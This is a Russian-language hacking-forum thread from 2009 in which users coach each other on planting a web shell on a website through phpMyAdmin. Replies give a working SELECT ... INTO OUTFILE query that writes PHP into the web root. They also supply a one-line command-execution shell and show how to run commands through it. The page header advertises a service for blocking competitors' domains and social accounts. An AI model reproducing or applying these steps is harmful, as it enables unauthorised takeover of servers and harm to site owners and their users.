УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Оффтоп > Болталка
phpmyadmin

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

phpmyadmin

19.02.2009, 17:31

DIMON4G

Участник форума

Регистрация: 25.05.2008

Сообщений: 201

Провел на форуме:
1860061

Репутация: 296

phpmyadmin

как там ваще можно шелку залить, если иметь аккаунт с полными привелегиями...

помощи нуждаюсь ачатовцы

19.02.2009, 17:34

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

_https://forum.xakepok.org/thread115.html

19.02.2009, 17:48

[JavaScript]

Познающий

Регистрация: 14.02.2009

Сообщений: 45

Провел на форуме:
96296

Репутация: 74

DIMON4G, если у вас времени нет, либо просто не хотите читать - объясню вкратце. Для начала необходимо знать полный путь к корню сервера. Его можно вызвать с помощью PHP-Ошибки (для этого надо иметь доступ к файлам). Если у вас его нету - можно сделать иначе - сменить на mysql пользователе пароль - в этом случае скрипт покажет ошибку, потому что не сможет подключиться к базе данных с заданым ему логином либо паролем. После этого пароль надо поставить назад. Потом выполнить запрос:

Код:

SELECT '<?php shellcode ?>' INTO OUTFILE '/var/www/site/shell.php'

Где /var/www/site - полный путь к корню, а shell.php - сам файл. Вроде ясно объяснил...

19.02.2009, 17:59

DIMON4G

Участник форума

Регистрация: 25.05.2008

Сообщений: 201

Провел на форуме:
1860061

Репутация: 296

SVAROG лажа со sql запросом какаято

Код:

SQL-запрос: 

CREATE TABLE 'hacker'(
'shell'TEXT
) 


Ответ MySQL:  
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hacker' ('shell' TEXT)' at line 1

[JavaScript]

Код:

<?php shellcode ?>

туда нада путь на сайте указывать? http://sait/ru/shell.txt или сам пхп код?

19.02.2009, 18:14

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

в shell.php пиши <? system($_GET['i']); ?>

Последний раз редактировалось SVAROG; 19.02.2009 в 18:40..

19.02.2009, 18:23

DIMON4G

Участник форума

Регистрация: 25.05.2008

Сообщений: 201

Провел на форуме:
1860061

Репутация: 296

Цитата:

Сообщение от SVAROG

в shell.txt пиши <? system($_GET['i']); ?>

написал, там в этом файле появилась ссылка http://sait.ru/shell.txt и всё

19.02.2009, 18:39

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

пля какой нахер txt (совсем заработался сегодня моск не варит) php
потом будешь выполнять команды типа http://sait.ru/shell.php?i=uname например
если винда там стоит то ищи мануал по командной строке винды если линукс то по линуксу маны кури )

19.02.2009, 19:04

DIMON4G

Участник форума

Регистрация: 25.05.2008

Сообщений: 201

Провел на форуме:
1860061

Репутация: 296

Цитата:

Сообщение от SVAROG

я говорю на самом сайте где я хочу шел залить пояляется надпись (ссылка), пхп код не загружается, напиши в аську, ппц мы тут тупить бум, просто я объяснить толком не могу я те!

19.02.2009, 19:23

[JavaScript]

Познающий

Регистрация: 14.02.2009

Сообщений: 45

Провел на форуме:
96296

Репутация: 74

DIMON4G, стукни мне в аську 400442244

#10

19.02.2009, 20:09

DIMON4G

Участник форума

Регистрация: 25.05.2008

Сообщений: 201

Провел на форуме:
1860061

Репутация: 296

[JavaScript] спс, настоящий мужиГ

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор уязвимостей phpMyAdmin ]	ettee	Сценарии/CMF/СMS	26	10.05.2010 09:55
phpmyadmin. Проблемы с кодировкой	LAGOX	PHP, PERL, MySQL, JavaScript	1	14.02.2009 15:52
Открыт скрипт установки и настройки phpmyadmin на webcreds.com	Neoveneficus	Уязвимости	1	28.11.2008 20:20
Установка MySQL 5 и phpMyAdmin	D=P=CH= MOD=	Чужие Статьи	1	05.10.2006 14:16

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход